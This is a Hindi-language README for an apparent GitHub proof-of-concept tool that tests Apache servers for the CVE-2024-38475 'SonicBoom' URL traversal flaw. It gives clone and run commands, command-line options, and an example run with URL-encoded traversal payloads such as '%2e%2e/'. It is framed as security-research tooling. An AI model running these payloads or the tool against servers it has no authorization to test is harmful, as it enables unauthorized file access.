
Author: abrewer251
CVE-2024-38475 ("SonicBoom") Apache URL ट्रैवर्सल भेद्यता के परीक्षण के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट टूल। यह स्क्रिप्ट अनधिकृत फ़ाइल एक्सेस की पहचान करने के लिए TLS नेगोशिएशन, डायरेक्टरी स्कैनिंग, ट्रैवर्सल सत्यापन और पेलोड फ़ज़िंग को स्वचालित करती है।
इस रिपॉज़िटरी में एक Python स्क्रिप्ट (poc.py) है जो:
यह PoC सुरक्षा शोधकर्ताओं और पेन-टेस्टरों को Apache सर्वरों में SonicBoom URL ट्रैवर्सल दोष को तेज़ी से मान्य करने में मदद करता है।
Python: 3.6 या उससे ऊपर
निर्भरताएँ:
requestspip के माध्यम से निर्भरताएँ इंस्टॉल करें:
pip install -r requirements.txt
नोट:
requirements.txtमें निम्न होना चाहिए:requests
git clone https://github.com/abrewer251/CVE-2024-38475_SonicBoom_Apache_URL_Traversal_PoC.git
cd CVE-2024-38475_SonicBoom_Apache_URL_Traversal_PoC
chmod +x poc.py
python3 poc.py [OPTIONS]
--schema उपयोग करने के लिए प्रोटोकॉल (http या https)--host लक्ष्य होस्ट या IP--port लक्ष्य पोर्ट--directory-wordlist डायरेक्टरी वर्डलिस्ट फ़ाइल का पथ--file-wordlist फ़ाइल वर्डलिस्ट फ़ाइल का पथ--output परिणाम लिखने का पथ| फ़्लैग | विवरण | डिफ़ॉल्ट |
|---|---|---|
-p, --payloads | जोड़ने के लिए URL-एन्कोडेड पेलोड (space-separated) | %3f %3Fany |
python3 poc.py \
--schema https \
--host 192.0.2.10 \
--port 8443 \
--directory-wordlist dirs.txt \
--file-wordlist files.txt \
--payloads "%2e%2e/" "%2e%2e%5C" \
--output findings.log
आउटपुट फ़ाइल में प्रत्येक परीक्षण चरण का लाइन-दर-लाइन लॉग होता है:
Done. Results saved to <output>प्रत्येक लॉग प्रविष्टि इस प्रारूप में होती है:
[Stage] Message or status
MIT लाइसेंस के तहत जारी किया गया। विवरण के लिए LICENSE देखें।
-h, --help | सहायता संदेश दिखाएँ | — |